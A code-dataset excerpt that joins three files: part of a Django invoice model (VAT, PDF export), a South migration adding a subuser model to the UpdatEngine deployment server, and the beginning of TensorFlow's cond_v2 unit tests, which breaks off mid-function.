natures = self.invoice_rows.values_list('category', flat=True).order_by('category').distinct()
result = []
natures_dict = dict(ROW_CATEGORY)
for nature in natures:
result.append(unicode(natures_dict[nature]))
return " & ".join(result)
def save(self, force_insert=False, force_update=False, using=None, user=None):
if not self.isInvoiceIdValid():
raise InvalidInvoiceIdError(ugettext('Invoice id must be less than or equal to %d') % (MAX_INVOICE_ID))
if not self.isInvoiceIdUnique(user):
raise InvoiceIdNotUniqueError(ugettext("Invoice id must be unique"))
super(Invoice, self).save(force_insert, force_update, using, user)
def check_amounts(self):
proposals = Proposal.objects.filter(invoice_rows__invoice=self).distinct()
for proposal in proposals:
remaining_amount = proposal.get_remaining_to_invoice(exclude_invoice=self)
rows_amount = InvoiceRow.objects.filter(invoice=self,
proposal=proposal).aggregate(amount=Sum('amount'))['amount'] or 0
if float(remaining_amount) < float(rows_amount):
raise InvoiceRowAmountError(ugettext("Amounts invoiced can't be greater than proposals remaining amounts"))
return True
def get_vat(self):
cursor = connection.cursor()
cursor.execute('SELECT SUM(accounts_invoicerow.amount * accounts_invoicerow.vat_rate / 100) AS "vat" FROM "accounts_invoicerow" WHERE "accounts_invoicerow"."invoice_id" = %s', [self.id])
row = cursor.fetchone()
vat = row[0] or Decimal(0)
vat = vat.quantize(Decimal(1)) if vat == vat.to_integral() else vat.normalize()
return vat
def amount_including_tax(self):
return self.amount + self.get_vat()
def to_pdf(self, user, response):
filename = ugettext('invoice_%(invoice_id)d.pdf') % {'invoice_id': self.invoice_id}
response['Content-Disposition'] = 'attachment; filename=%s' % (filename)
invoice_template = InvoiceTemplate(response, user)
invoice_template.init_doc(ugettext('Invoice #%(invoice_id)d') % {'invoice_id': self.invoice_id})
invoice_template.add_headers(self, self.customer, self.edition_date)
invoice_template.add_title(_("INVOICE #%d") % (self.invoice_id))
# proposal row list
rows = self.invoice_rows.all()
invoice_template.add_rows(rows)
# total amount on the right side of footer
right_block = invoice_template.get_total_amount(self.amount, rows)
invoice_amount = self.amount
invoice_amount = invoice_amount.quantize(Decimal(1)) if invoice_amount == invoice_amount.to_integral() else invoice_amount.normalize()
left_block = [Paragraph(_("Payment date : %s") % (localize(self.payment_date)), InvoiceTemplate.styleN),
Paragraph(_("Penalty begins on : %s") % (localize(self.penalty_date) or ''), InvoiceTemplate.styleN),
Paragraph(_("Penalty rate : %s") % (localize(self.penalty_rate) or ''), InvoiceTemplate.styleN),
Paragraph(_("Discount conditions : %s") % (self.discount_conditions or ''), InvoiceTemplate.styleN)]
if self.footer_note:
left_block.append(Spacer(invoice_template.doc.width, 0.1 * inch))
left_block.append(Paragraph(self.footer_note, InvoiceTemplate.styleNSmall))
else:
left_block.append(Spacer(invoice_template.doc.width, 0.2 * inch))
if self.owner.get_profile().iban_bban:
left_block.append(Paragraph(_("IBAN/BBAN : %s") % (self.owner.get_profile().iban_bban), InvoiceTemplate.styleNSmall))
if self.owner.get_profile().bic:
left_block.append(Paragraph(_("BIC/SWIFT : %s") % (self.owner.get_profile().bic), InvoiceTemplate.styleNSmall))
data = [[left_block,
'',
right_block], ]
if self.execution_begin_date and self.execution_end_date:
data[0][0].insert(1, Paragraph(_("Execution dates : %(begin_date)s to %(end_date)s") % {'begin_date': localize(self.execution_begin_date), 'end_date' : localize(self.execution_end_date)}, InvoiceTemplate.styleN))
footer_table = Table(data, [4.5 * inch, 0.3 * inch, 2.5 * inch], [1 * inch])
footer_table.setStyle(TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP'), ]))
invoice_template.append_to_story(footer_table)
invoice_template.build()
return response
class InvoiceRowAmountError(Exception):
pass
class InvoiceRow(Row):
invoice = models.ForeignKey(Invoice, related_name="invoice_rows")
proposal = models.ForeignKey(Proposal, related_name="invoice_rows", verbose_name=_('Proposal'), null=True, blank=True)
balance_payments = models.BooleanField(verbose_name=_('Balance payments for the proposal'), help_text=_('"Balancing payments for the proposal" means there will be no future invoices for the selected proposal. Thus the amount remaining to invoice for this proposal will fall to zero and its state will be set to "balanced" when all invoices are paid.'))
class Meta:
ordering = ['id']
def save(self, force_insert=False, force_update=False, using=None, user=None):
super(InvoiceRow, self).save(force_insert, force_update, using, user)
def update_invoice_amount(sender, instance, created=None, **kwargs):
row = instance
invoice = row.invoice
invoice.amount = invoice.invoice_rows.all().aggregate(sum=Sum('amount'))['sum'] or 0
invoice.save(user=invoice.owner)
pre_save.connect(update_row_amount, sender=InvoiceRow)
post_save.connect(update_invoice_amount, sender=InvoiceRow)
post_delete.connect(update_invoice_amount, sender=InvoiceRow)
| agpl-3.0 | 442,697,370,310,873,200 | 56.214689 | 356 | 0.604325 | false |
updatengine/updatengine-server | configuration/migrations/0005_auto__add_subuser.py | 1 | 11187 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'subuser'
db.create_table(u'configuration_subuser', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.OneToOneField')(related_name='subuser', unique=True, to=orm['auth.User'])),
))
db.send_create_signal(u'configuration', ['subuser'])
# Adding M2M table for field entity on 'subuser'
m2m_table_name = db.shorten_name(u'configuration_subuser_entity')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('subuser', models.ForeignKey(orm[u'configuration.subuser'], null=False)),
('entity', models.ForeignKey(orm[u'inventory.entity'], null=False))
))
db.create_unique(m2m_table_name, ['subuser_id', 'entity_id'])
def backwards(self, orm):
# Deleting model 'subuser'
db.delete_table(u'configuration_subuser')
# Removing M2M table for field entity on 'subuser'
db.delete_table(db.shorten_name(u'configuration_subuser_entity'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'configuration.deployconfig': {
'Meta': {'object_name': 'deployconfig'},
'activate_deploy': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'}),
'activate_time_deploy': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'end_time': ('django.db.models.fields.TimeField', [], {}),
'entity': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['inventory.entity']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'100'"}),
'packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['deploy.packageprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {}),
'timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['deploy.timeprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
u'configuration.subuser': {
'Meta': {'object_name': 'subuser'},
'entity': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': u"orm['inventory.entity']", 'null': 'True', 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'subuser'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'deploy.package': {
'Meta': {'ordering': "['name']", 'object_name': 'package'},
'command': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
'conditions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['deploy.packagecondition']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'filename': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignoreperiod': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'packagesum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'public': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'})
},
u'deploy.packagecondition': {
'Meta': {'ordering': "['name']", 'object_name': 'packagecondition'},
'depends': ('django.db.models.fields.CharField', [], {'default': "'installed'", 'max_length': '12'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'softwarename': ('django.db.models.fields.CharField', [], {'default': "'undefined'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'softwareversion': ('django.db.models.fields.CharField', [], {'default': "'undefined'", 'max_length': '500', 'null': 'True', 'blank': 'True'})
},
u'deploy.packageprofile': {
'Meta': {'ordering': "['name']", 'object_name': 'packageprofile'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'packages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['deploy.package']", 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.packageprofile']"})
},
u'deploy.timeprofile': {
'Meta': {'ordering': "['start_time']", 'object_name': 'timeprofile'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'start_time': ('django.db.models.fields.TimeField', [], {})
},
u'inventory.entity': {
'Meta': {'ordering': "['name']", 'object_name': 'entity'},
'description': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
'force_packageprofile': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'force_timeprofile': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'old_packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'old_packageprofile'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.packageprofile']"}),
'old_timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'old_timeprofile'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.timeprofile']"}),
'packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['deploy.packageprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['inventory.entity']"}),
'timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['deploy.timeprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
}
}
complete_apps = ['configuration'] | gpl-2.0 | 1,402,998,412,544,026,400 | 77.788732 | 231 | 0.563332 | false |
asimshankar/tensorflow | tensorflow/python/kernel_tests/cond_v2_test.py | 1 | 35442 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cond_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
from tensorflow.python.util import compat
class CondV2Test(test.TestCase):
def _testCond(self, true_fn, false_fn, train_vals, feed_dict=None):
if not feed_dict:
feed_dict = {}
with self.session(graph=ops.get_default_graph()) as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
expected = control_flow_ops.cond(pred, true_fn, false_fn, name="expected")
actual = cond_v2.cond_v2(pred, true_fn, false_fn, name="actual")
expected_grad = gradients_impl.gradients(expected, train_vals)
actual_grad = gradients_impl.gradients(actual, train_vals)
sess_run_args = {pred: True}
sess_run_args.update(feed_dict)
expected_val, actual_val, expected_grad_val, actual_grad_val = sess.run(
(expected, actual, expected_grad, actual_grad), sess_run_args)
self.assertEqual(expected_val, actual_val)
self.assertEqual(expected_grad_val, actual_grad_val)
sess_run_args = {pred: False}
sess_run_args.update(feed_dict)
expected_val, actual_val, expected_grad_val, actual_grad_val = sess.run(
(expected, actual, expected_grad, actual_grad), sess_run_args)
self.assertEqual(expected_val, actual_val)
self.assertEqual(expected_grad_val, actual_grad_val)
@test_util.run_deprecated_v1
def testBasic(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return x * 2.0
def false_fn():
return y * 3.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testMultipleOutputs(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return x * y, y
def false_fn():
return x, y * 3.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testBasic2(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return x * y * 2.0
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testNoInputs(self):
with self.cached_session() as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
def true_fn():
return constant_op.constant(1.0)
def false_fn():
return constant_op.constant(2.0)
out = cond_v2.cond_v2(pred, true_fn, false_fn)
self.assertEqual(sess.run(out, {pred: True}), (1.0,))
self.assertEqual(sess.run(out, {pred: False}), (2.0,))
def _createCond(self, name):
"""Creates a cond_v2 call and returns the output tensor and the cond op."""
pred = constant_op.constant(True, name="pred")
x = constant_op.constant(1.0, name="x")
def true_fn():
return x
def false_fn():
return x + 1
output = cond_v2.cond_v2(pred, true_fn, false_fn, name=name)
cond_op = output.op.inputs[0].op
self.assertEqual(cond_op.type, "If")
return output, cond_op
def testDefaultName(self):
with ops.Graph().as_default():
_, cond_op = self._createCond(None)
self.assertEqual(cond_op.name, "cond")
self.assertRegexpMatches(
cond_op.get_attr("then_branch").name, r"cond_true_\d*")
self.assertRegexpMatches(
cond_op.get_attr("else_branch").name, r"cond_false_\d*")
with ops.Graph().as_default():
with ops.name_scope("foo"):
_, cond1_op = self._createCond("")
self.assertEqual(cond1_op.name, "foo/cond")
self.assertRegexpMatches(
cond1_op.get_attr("then_branch").name, r"foo_cond_true_\d*")
self.assertRegexpMatches(
cond1_op.get_attr("else_branch").name, r"foo_cond_false_\d*")
_, cond2_op = self._createCond(None)
self.assertEqual(cond2_op.name, "foo/cond_1")
self.assertRegexpMatches(
cond2_op.get_attr("then_branch").name, r"foo_cond_1_true_\d*")
self.assertRegexpMatches(
cond2_op.get_attr("else_branch").name, r"foo_cond_1_false_\d*")
@test_util.run_v1_only("b/120545219")
def testDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
@function.defun
def fn():
return x * y * 2.0
return fn()
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testNestedDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
@function.defun
def fn():
@function.defun
def nested_fn():
return x * y * 2.0
return nested_fn()
return fn()
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testDoubleNestedDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
@function.defun
def fn():
@function.defun
def nested_fn():
@function.defun
def nested_nested_fn():
return x * y * 2.0
return nested_nested_fn()
return nested_fn()
return fn()
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
def testNestedCond(self):
def run_test(pred_value):
def build_graph():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def false_true_fn():
return x * y * 2.0
def false_false_fn():
return x * 5.0
return _cond(pred, false_true_fn, false_false_fn, "inside_false_fn")
return x, y, pred, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {pred: pred_value})
self._testCond(true_fn, false_fn, [x], {pred: pred_value})
self._testCond(true_fn, false_fn, [y], {pred: pred_value})
run_test(True)
run_test(False)
def testNestedCondBothBranches(self):
def run_test(pred_value):
def build_graph():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return _cond(pred, lambda: x + y, lambda: x * x, name=None)
def false_fn():
return _cond(pred, lambda: x - y, lambda: y * y, name=None)
return x, y, pred, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {pred: pred_value})
self._testCond(true_fn, false_fn, [x], {pred: pred_value})
self._testCond(true_fn, false_fn, [y], {pred: pred_value})
run_test(True)
run_test(False)
def testDoubleNestedCond(self):
def run_test(pred1_value, pred2_value):
def build_graph():
pred1 = array_ops.placeholder(dtypes.bool, name="pred1")
pred2 = array_ops.placeholder(dtypes.bool, name="pred2")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def false_true_fn():
def false_true_true_fn():
return x * y * 2.0
def false_true_false_fn():
return x * 10.0
return _cond(
pred1,
false_true_true_fn,
false_true_false_fn,
name="inside_false_true_fn")
def false_false_fn():
return x * 5.0
return _cond(
pred2, false_true_fn, false_false_fn, name="inside_false_fn")
return x, y, pred1, pred2, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {
pred1: pred1_value,
pred2: pred2_value
})
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x], {
pred1: pred1_value,
pred2: pred2_value
})
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [y], {
pred1: pred1_value,
pred2: pred2_value
})
run_test(True, True)
run_test(True, False)
run_test(False, False)
run_test(False, True)
def testGradientFromInsideDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
# Compute grads inside a Defun.
@function.defun
def nesting_fn():
return gradients_impl.gradients(cond_outer, [x, y])
grads = nesting_fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default():
grads, pred_outer, pred_inner = build_graph()
with self.session(graph=ops.get_default_graph()) as sess:
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
def testGradientFromInsideNestedDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
# Compute grads inside a Defun.
@function.defun
def nesting_fn():
@function.defun
def inner_nesting_fn():
return gradients_impl.gradients(cond_outer, [x, y])
return inner_nesting_fn()
grads = nesting_fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default():
grads, pred_outer, pred_inner = build_graph()
with self.session(graph=ops.get_default_graph()) as sess:
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
def testBuildCondAndGradientInsideDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
# Build cond and its gradient inside a Defun.
@function.defun
def fn():
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
return gradients_impl.gradients(cond_outer, [x, y])
grads = fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default(), self.session(
graph=ops.get_default_graph()) as sess:
grads, pred_outer, pred_inner = build_graph()
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
@test_util.run_deprecated_v1
def testSecondDerivative(self):
with self.cached_session() as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(3.0, name="x")
def true_fn():
return math_ops.pow(x, 3)
def false_fn():
return x
cond = cond_v2.cond_v2(pred, true_fn, false_fn, name="cond")
cond_grad = gradients_impl.gradients(cond, [x])
cond_grad_grad = gradients_impl.gradients(cond_grad, [x])
# d[x^3]/dx = 3x^2
true_val = sess.run(cond_grad, {pred: True})
self.assertEqual(true_val, [27.0])
# d[x]/dx = 1
false_val = sess.run(cond_grad, {pred: False})
self.assertEqual(false_val, [1.0])
true_val = sess.run(cond_grad_grad, {pred: True})
# d2[x^3]/dx2 = 6x
self.assertEqual(true_val, [18.0])
false_val = sess.run(cond_grad_grad, {pred: False})
# d2[x]/dx2 = 0
self.assertEqual(false_val, [0.0])
def testGradientOfDeserializedCond(self):
with ops.Graph().as_default():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(3.0, name="x")
ops.add_to_collection("x", x)
def true_fn():
return math_ops.pow(x, 3)
def false_fn():
return x
ops.add_to_collection("pred", pred)
cond = cond_v2.cond_v2(pred, true_fn, false_fn, name="cond")
ops.add_to_collection("cond", cond)
meta_graph = saver.export_meta_graph()
with ops.Graph().as_default() as g:
with self.session(graph=g) as sess:
saver.import_meta_graph(meta_graph)
x = ops.get_collection("x")[0]
pred = ops.get_collection("pred")[0]
cond = ops.get_collection("cond")
cond_grad = gradients_impl.gradients(cond, [x], name="cond_grad")
cond_grad_grad = gradients_impl.gradients(
cond_grad, [x], name="cond_grad_grad")
# d[x^3]/dx = 3x^2
true_val = sess.run(cond_grad, {pred: True})
self.assertEqual(true_val, [27.0])
# d[x]/dx = 1
false_val = sess.run(cond_grad, {pred: False})
self.assertEqual(false_val, [1.0])
true_val = sess.run(cond_grad_grad, {pred: True})
# d2[x^3]/dx2 = 6x
self.assertEqual(true_val, [18.0])
false_val = sess.run(cond_grad_grad, {pred: False})
# d2[x]/dx2 = 0
self.assertEqual(false_val, [0.0])
def testLowering(self):
with ops.Graph().as_default() as g:
with self.session(graph=g) as sess:
cond_output, _ = self._createCond("cond")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(cond_output, options=run_options, run_metadata=run_metadata)
# If lowering was enabled, there should be a `Switch` node
switch_found = any(
any(node.op == "Switch" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertTrue(switch_found,
"A `Switch` op should exist if the graph was lowered.")
# If lowering was enabled, there should be no `If` node
if_found = any(
any(node.op == "If" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertFalse(if_found,
"An `If` op was found, but it should be lowered.")
@test_util.run_deprecated_v1
def testLoweringDisabledInXLA(self):
with self.session(graph=ops.Graph()) as sess:
# Build the cond_v2 in an XLA context
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
cond_output, _ = self._createCond("cond")
xla_context.Exit()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(cond_output, options=run_options, run_metadata=run_metadata)
# Lowering disabled in XLA, there should be no `Switch` node
switch_found = any(
any(node.op == "Switch" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertFalse(
switch_found,
"A `Switch` op exists, but the graph should not be lowered.")
# Lowering disabled in XLA, there should still be an `If` node
if_found = any(
any(node.op == "If" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertTrue(
if_found,
"An `If` op was not found, but the graph should not be lowered.")
@test_util.run_deprecated_v1
def testLoweringDisabledWithSingleThreadedExecutorContext(self):
with self.session(graph=ops.Graph()) as sess:
@function.defun
def _add_cond(x):
